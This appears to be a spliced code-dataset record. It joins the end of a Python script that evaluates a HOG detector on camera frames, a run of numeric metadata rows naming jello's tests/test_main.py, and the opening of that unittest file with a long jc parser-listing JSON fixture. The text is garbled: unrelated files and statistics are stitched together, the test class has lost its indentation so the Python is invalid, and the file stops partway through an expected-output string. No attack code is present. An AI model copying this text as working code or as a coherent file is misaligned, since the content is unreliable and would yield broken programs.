    ``is not None``, and the large commented-out ICF evaluation block was
    removed.  icf_classifier_file and icf_result_dir are kept so the call
    signature stays unchanged for existing callers.
    """
    hog_classifier = tester_hog.load_classifier(hog_classifier_file)
    filepaths = [
        "/home/mataevs/captures/metadata/dump_05_05_01_50",
        "/home/mataevs/captures/metadata/dump_05_06_13_10",
        "/home/mataevs/captures/metadata/dump_10_06_11_47",
        "/home/mataevs/captures/metadata/dump_05_05_01_51",
        "/home/mataevs/captures/metadata/dump_05_06_13_15",
        "/home/mataevs/captures/metadata/dump_07_05_11_40",
        "/home/mataevs/captures/metadata/dump_10_06_11_48",
        "/home/mataevs/captures/metadata/dump_05_05_11_54",
        "/home/mataevs/captures/metadata/dump_05_06_13_20",
        "/home/mataevs/captures/metadata/dump_07_05_11_46",
        "/home/mataevs/captures/metadata/dump_10_06_12_16",
        "/home/mataevs/captures/metadata/dump_05_06_12_57",
        "/home/mataevs/captures/metadata/dump_05_06_13_21",
        "/home/mataevs/captures/metadata/dump_05_06_13_24",
        "/home/mataevs/captures/metadata/dump_16_06_14_57",
        "/home/mataevs/captures/metadata/dump_05_06_13_25",
        "/home/mataevs/captures/metadata/dump_07_05_12_03",
        "/home/mataevs/captures/metadata/dump_16_06_15_26",
        "/home/mataevs/captures/metadata/dump_05_06_13_28",
        "/home/mataevs/captures/metadata/dump_07_05_12_05"
    ]
    if not os.path.exists(hog_result_dir):
        os.makedirs(hog_result_dir)
    if not os.path.exists(icf_result_dir):
        os.makedirs(icf_result_dir)
    metadata = utils.parseMetadata(*filepaths)
    # Camera-tilt-dependent pyramid scales (same buckets as test_multiscale).
    scales = [
        [0.45, 0.5, 0.55],
        [0.4, 0.45, 0.5],
        [0.3, 0.35],
        [0.3]
    ]
    scaleSteps = [35, 45, 65, 90]
    resultsHog = open(resultsFile + "hog.txt", "w")
    try:
        sample = 0
        for imgPath in checker.getFileList():
            img = cv2.imread(imgPath)
            tilt = int(metadata[imgPath]['tilt'])
            if tilt > 90:
                # Mirror tilt angles above 90 degrees back into [0, 90].
                tilt = 90 - (tilt - 90)
            imgScales = []
            for i in range(0, len(scaleSteps)):
                if tilt < scaleSteps[i]:
                    imgScales = scales[i]
                    break
            # Optical flow is disabled for the checker run: the detector
            # searches the whole frame.
            boundingRect = None
            posWindowsHog = tester_hog.test_img(
                hog_classifier, imgPath, imgScales, subwindow=boundingRect)
            if posWindowsHog is not None and posWindowsHog != []:
                utils.draw_detections(img, posWindowsHog)
            cv2.imwrite(hog_result_dir + "/sample_2_" + str(sample) + ".jpg", img)
            # Compare detections against ground-truth annotations and log
            # true-positive / false-positive / false-negative counts.
            detections, truePositive = checker.checkDetections(imgPath, posWindowsHog)
            c = Counter(detections)
            truePositives = c[True]
            falsePositives = c[False]
            falseNegative = 0 if truePositive else 1
            resultsHog.write(imgPath + " tp=" + str(truePositives) +
                             " fp=" + str(falsePositives) +
                             " fn=" + str(falseNegative) + "\n")
            sample += 1
    finally:
        resultsHog.close()
# Earlier experiment (random-sample evaluation with optical flow), kept for
# reference:
# test_multiscale("hog/svm.dump",
#     "icf_new_5000_2000_1k.dump",
#     "./hog_result_all_flow",
#     "./icf_result_all_flow",
#     100)

# Script entry point: evaluate the HOG detector on every frame listed in the
# hand-labelled annotations file and write per-image tp/fp/fn results.
checker = detection_checker.Checker("annotations.txt")
test_multiscale_checker("hog/svm.dump",
                        "icf_classifiers/icf_new_5000f_2000e.dump",
                        "./hog_result_dir",
                        "./icf_5000_2000",
                        checker,
                        "results_hog_")
| 38.367188
| 141
| 0.624007
| 1,253
| 9,822
| 4.626496
| 0.132482
| 0.075901
| 0.131102
| 0.186303
| 0.778334
| 0.769018
| 0.769018
| 0.746248
| 0.730723
| 0.730723
| 0
| 0.069509
| 0.250051
| 9,822
| 255
| 142
| 38.517647
| 0.717486
| 0.139788
| 0
| 0.662857
| 0
| 0
| 0.252526
| 0.233028
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.057143
| null | null | 0.011429
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
336e3e082850e3f0276fc3283c09a37bb14bc4e0
| 153,541
|
py
|
Python
|
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
roehling/jello
|
1073355e2bbfcd4f92af2584c9e539ce34859fc0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
import os
import sys
import io
import contextlib
import unittest
from unittest.mock import patch
import jello.cli
from jello.lib import opts
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
def setUp(self):
# initialize options
opts.initialize = None
opts.version_info = None
opts.helpme = None
opts.compact = None
opts.nulls = None
opts.raw = None
opts.lines = None
opts.mono = None
opts.schema = None
opts.types = None
opts.keyname_color = None
opts.keyword_color = None
opts.number_color = None
opts.string_color = None
self.jc_a_output = '''{"name": "jc", "version": "1.9.3", "description": "jc cli output JSON conversion tool", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "parser_count": 50, "parsers": [{"name": "airport", "argument": "--airport", "version": "1.0", "description": "airport -I command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["darwin"], "magic_commands": ["airport -I"]}, {"name": "airport_s", "argument": "--airport-s", "version": "1.0", "description": "airport -s command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["darwin"], "magic_commands": ["airport -s"]}, {"name": "arp", "argument": "--arp", "version": "1.2", "description": "arp command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["arp"]}, {"name": "blkid", "argument": "--blkid", "version": "1.0", "description": "blkid command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["blkid"]}, {"name": "crontab", "argument": "--crontab", "version": "1.1", "description": "crontab command and file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["crontab"]}, {"name": "crontab_u", "argument": "--crontab-u", "version": "1.0", "description": "crontab file parser with user support", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "csv", "argument": "--csv", "version": "1.0", "description": "CSV file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the python standard csv library", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "df", "argument": "--df", 
"version": "1.1", "description": "df command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["df"]}, {"name": "dig", "argument": "--dig", "version": "1.1", "description": "dig command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["dig"]}, {"name": "du", "argument": "--du", "version": "1.1", "description": "du command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["du"]}, {"name": "env", "argument": "--env", "version": "1.1", "description": "env command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["env"]}, {"name": "file", "argument": "--file", "version": "1.1", "description": "file command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["file"]}, {"name": "free", "argument": "--free", "version": "1.0", "description": "free command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["free"]}, {"name": "fstab", "argument": "--fstab", "version": "1.0", "description": "fstab file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"]}, {"name": "group", "argument": "--group", "version": "1.0", "description": "/etc/group file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "gshadow", "argument": "--gshadow", "version": "1.0", "description": "/etc/gshadow file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", 
"compatible": ["linux", "aix", "freebsd"]}, {"name": "history", "argument": "--history", "version": "1.2", "description": "history command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Optimizations by https://github.com/philippeitis", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"]}, {"name": "hosts", "argument": "--hosts", "version": "1.0", "description": "/etc/hosts file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "id", "argument": "--id", "version": "1.0", "description": "id command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["id"]}, {"name": "ifconfig", "argument": "--ifconfig", "version": "1.5", "description": "ifconfig command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser", "compatible": ["linux", "aix", "freebsd", "darwin"], "magic_commands": ["ifconfig"]}, {"name": "ini", "argument": "--ini", "version": "1.0", "description": "INI file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using configparser from the standard library", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "iptables", "argument": "--iptables", "version": "1.1", "description": "iptables command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["iptables"]}, {"name": "jobs", "argument": "--jobs", "version": "1.0", "description": "jobs command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["jobs"]}, {"name": "last", 
"argument": "--last", "version": "1.0", "description": "last and lastb command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"], "magic_commands": ["last", "lastb"]}, {"name": "ls", "argument": "--ls", "version": "1.3", "description": "ls command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["ls"]}, {"name": "lsblk", "argument": "--lsblk", "version": "1.3", "description": "lsblk command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsblk"]}, {"name": "lsmod", "argument": "--lsmod", "version": "1.1", "description": "lsmod command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsmod"]}, {"name": "lsof", "argument": "--lsof", "version": "1.0", "description": "lsof command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["lsof"]}, {"name": "mount", "argument": "--mount", "version": "1.1", "description": "mount command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["mount"]}, {"name": "netstat", "argument": "--netstat", "version": "1.2", "description": "netstat command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["netstat"]}, {"name": "ntpq", "argument": "--ntpq", "version": "1.0", "description": "ntpq -p command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["ntpq"]}, {"name": "passwd", "argument": "--passwd", "version": "1.0", "description": "/etc/passwd file parser", "author": "Kelly Brazil", "author_email": 
"kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "pip_list", "argument": "--pip-list", "version": "1.0", "description": "pip list command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["pip list", "pip3 list"]}, {"name": "pip_show", "argument": "--pip-show", "version": "1.0", "description": "pip show command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"], "magic_commands": ["pip show", "pip3 show"]}, {"name": "ps", "argument": "--ps", "version": "1.1", "description": "ps command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["ps"]}, {"name": "route", "argument": "--route", "version": "1.0", "description": "route command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["route"]}, {"name": "shadow", "argument": "--shadow", "version": "1.0", "description": "/etc/shadow file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "aix", "freebsd"]}, {"name": "ss", "argument": "--ss", "version": "1.0", "description": "ss command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["ss"]}, {"name": "stat", "argument": "--stat", "version": "1.0", "description": "stat command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["stat"]}, {"name": "systemctl", "argument": "--systemctl", "version": "1.0", "description": "systemctl command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": 
["linux"], "magic_commands": ["systemctl"]}, {"name": "systemctl_lj", "argument": "--systemctl-lj", "version": "1.0", "description": "systemctl list-jobs command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-jobs"]}, {"name": "systemctl_ls", "argument": "--systemctl-ls", "version": "1.0", "description": "systemctl list-sockets command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-sockets"]}, {"name": "systemctl_luf", "argument": "--systemctl-luf", "version": "1.0", "description": "systemctl list-unit-files command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["systemctl list-unit-files"]}, {"name": "timedatectl", "argument": "--timedatectl", "version": "1.0", "description": "timedatectl status command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux"], "magic_commands": ["timedatectl", "timedatectl status"]}, {"name": "uname", "argument": "--uname", "version": "1.1", "description": "uname -a command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin"], "magic_commands": ["uname"]}, {"name": "uptime", "argument": "--uptime", "version": "1.0", "description": "uptime command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["uptime"]}, {"name": "w", "argument": "--w", "version": "1.0", "description": "w command parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["w"]}, {"name": "who", "argument": "--who", "version": "1.0", "description": "who command parser", "author": "Kelly Brazil", 
"author_email": "kellyjonbrazil@gmail.com", "compatible": ["linux", "darwin", "cygwin", "aix", "freebsd"], "magic_commands": ["who"]}, {"name": "xml", "argument": "--xml", "version": "1.0", "description": "XML file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the xmltodict library at https://github.com/martinblech/xmltodict", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}, {"name": "yaml", "argument": "--yaml", "version": "1.0", "description": "YAML file parser", "author": "Kelly Brazil", "author_email": "kellyjonbrazil@gmail.com", "details": "Using the ruamel.yaml library at https://pypi.org/project/ruamel.yaml", "compatible": ["linux", "darwin", "cygwin", "win32", "aix", "freebsd"]}]}'''
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitterdata.jlines'), 'r', encoding='utf-8') as f:
self.twitterdata = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitterdata.json'), 'r', encoding='utf-8') as f:
self.twitterdata_output = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitter-table-output.jlines'), 'r', encoding='utf-8') as f:
self.twitter_table_output = f.read()
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/twitter-table-output.schema'), 'r', encoding='utf-8') as f:
self.twitter_table_output_schema = f.read()
def test_jc_a(self):
    """
    Test jc -a | jello
    """
    # Expected stdout: the jc parser listing pretty-printed with jello's
    # default 2-space JSON indentation. The '''\ continuation keeps the
    # string's first line flush with the captured output.
    self.expected = '''\
{
  "name": "jc",
  "version": "1.9.3",
  "description": "jc cli output JSON conversion tool",
  "author": "Kelly Brazil",
  "author_email": "kellyjonbrazil@gmail.com",
  "parser_count": 50,
  "parsers": [
    {
      "name": "airport",
      "argument": "--airport",
      "version": "1.0",
      "description": "airport -I command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "darwin"
      ],
      "magic_commands": [
        "airport -I"
      ]
    },
    {
      "name": "airport_s",
      "argument": "--airport-s",
      "version": "1.0",
      "description": "airport -s command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "darwin"
      ],
      "magic_commands": [
        "airport -s"
      ]
    },
    {
      "name": "arp",
      "argument": "--arp",
      "version": "1.2",
      "description": "arp command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "aix",
        "freebsd",
        "darwin"
      ],
      "magic_commands": [
        "arp"
      ]
    },
    {
      "name": "blkid",
      "argument": "--blkid",
      "version": "1.0",
      "description": "blkid command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "blkid"
      ]
    },
    {
      "name": "crontab",
      "argument": "--crontab",
      "version": "1.1",
      "description": "crontab command and file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "crontab"
      ]
    },
    {
      "name": "crontab_u",
      "argument": "--crontab-u",
      "version": "1.0",
      "description": "crontab file parser with user support",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "csv",
      "argument": "--csv",
      "version": "1.0",
      "description": "CSV file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Using the python standard csv library",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "df",
      "argument": "--df",
      "version": "1.1",
      "description": "df command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin"
      ],
      "magic_commands": [
        "df"
      ]
    },
    {
      "name": "dig",
      "argument": "--dig",
      "version": "1.1",
      "description": "dig command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "aix",
        "freebsd",
        "darwin"
      ],
      "magic_commands": [
        "dig"
      ]
    },
    {
      "name": "du",
      "argument": "--du",
      "version": "1.1",
      "description": "du command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "du"
      ]
    },
    {
      "name": "env",
      "argument": "--env",
      "version": "1.1",
      "description": "env command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "env"
      ]
    },
    {
      "name": "file",
      "argument": "--file",
      "version": "1.1",
      "description": "file command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "aix",
        "freebsd",
        "darwin"
      ],
      "magic_commands": [
        "file"
      ]
    },
    {
      "name": "free",
      "argument": "--free",
      "version": "1.0",
      "description": "free command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "free"
      ]
    },
    {
      "name": "fstab",
      "argument": "--fstab",
      "version": "1.0",
      "description": "fstab file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ]
    },
    {
      "name": "group",
      "argument": "--group",
      "version": "1.0",
      "description": "/etc/group file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "gshadow",
      "argument": "--gshadow",
      "version": "1.0",
      "description": "/etc/gshadow file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "history",
      "argument": "--history",
      "version": "1.2",
      "description": "history command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Optimizations by https://github.com/philippeitis",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "hosts",
      "argument": "--hosts",
      "version": "1.0",
      "description": "/etc/hosts file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "id",
      "argument": "--id",
      "version": "1.0",
      "description": "id command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "id"
      ]
    },
    {
      "name": "ifconfig",
      "argument": "--ifconfig",
      "version": "1.5",
      "description": "ifconfig command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Using ifconfig-parser package from https://github.com/KnightWhoSayNi/ifconfig-parser",
      "compatible": [
        "linux",
        "aix",
        "freebsd",
        "darwin"
      ],
      "magic_commands": [
        "ifconfig"
      ]
    },
    {
      "name": "ini",
      "argument": "--ini",
      "version": "1.0",
      "description": "INI file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "details": "Using configparser from the standard library",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "iptables",
      "argument": "--iptables",
      "version": "1.1",
      "description": "iptables command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "iptables"
      ]
    },
    {
      "name": "jobs",
      "argument": "--jobs",
      "version": "1.0",
      "description": "jobs command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "jobs"
      ]
    },
    {
      "name": "last",
      "argument": "--last",
      "version": "1.0",
      "description": "last and lastb command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "last",
        "lastb"
      ]
    },
    {
      "name": "ls",
      "argument": "--ls",
      "version": "1.3",
      "description": "ls command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "ls"
      ]
    },
    {
      "name": "lsblk",
      "argument": "--lsblk",
      "version": "1.3",
      "description": "lsblk command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "lsblk"
      ]
    },
    {
      "name": "lsmod",
      "argument": "--lsmod",
      "version": "1.1",
      "description": "lsmod command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "lsmod"
      ]
    },
    {
      "name": "lsof",
      "argument": "--lsof",
      "version": "1.0",
      "description": "lsof command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "lsof"
      ]
    },
    {
      "name": "mount",
      "argument": "--mount",
      "version": "1.1",
      "description": "mount command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin"
      ],
      "magic_commands": [
        "mount"
      ]
    },
    {
      "name": "netstat",
      "argument": "--netstat",
      "version": "1.2",
      "description": "netstat command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "netstat"
      ]
    },
    {
      "name": "ntpq",
      "argument": "--ntpq",
      "version": "1.0",
      "description": "ntpq -p command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "ntpq"
      ]
    },
    {
      "name": "passwd",
      "argument": "--passwd",
      "version": "1.0",
      "description": "/etc/passwd file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "pip_list",
      "argument": "--pip-list",
      "version": "1.0",
      "description": "pip list command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "pip list",
        "pip3 list"
      ]
    },
    {
      "name": "pip_show",
      "argument": "--pip-show",
      "version": "1.0",
      "description": "pip show command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "win32",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "pip show",
        "pip3 show"
      ]
    },
    {
      "name": "ps",
      "argument": "--ps",
      "version": "1.1",
      "description": "ps command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "cygwin",
        "aix",
        "freebsd"
      ],
      "magic_commands": [
        "ps"
      ]
    },
    {
      "name": "route",
      "argument": "--route",
      "version": "1.0",
      "description": "route command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "route"
      ]
    },
    {
      "name": "shadow",
      "argument": "--shadow",
      "version": "1.0",
      "description": "/etc/shadow file parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux",
        "darwin",
        "aix",
        "freebsd"
      ]
    },
    {
      "name": "ss",
      "argument": "--ss",
      "version": "1.0",
      "description": "ss command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "ss"
      ]
    },
    {
      "name": "stat",
      "argument": "--stat",
      "version": "1.0",
      "description": "stat command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "stat"
      ]
    },
    {
      "name": "systemctl",
      "argument": "--systemctl",
      "version": "1.0",
      "description": "systemctl command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "systemctl"
      ]
    },
    {
      "name": "systemctl_lj",
      "argument": "--systemctl-lj",
      "version": "1.0",
      "description": "systemctl list-jobs command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "systemctl list-jobs"
      ]
    },
    {
      "name": "systemctl_ls",
      "argument": "--systemctl-ls",
      "version": "1.0",
      "description": "systemctl list-sockets command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "systemctl list-sockets"
      ]
    },
    {
      "name": "systemctl_luf",
      "argument": "--systemctl-luf",
      "version": "1.0",
      "description": "systemctl list-unit-files command parser",
      "author": "Kelly Brazil",
      "author_email": "kellyjonbrazil@gmail.com",
      "compatible": [
        "linux"
      ],
      "magic_commands": [
        "systemctl list-unit-files"
      ]
    },
    {
      "name": "timedatectl",
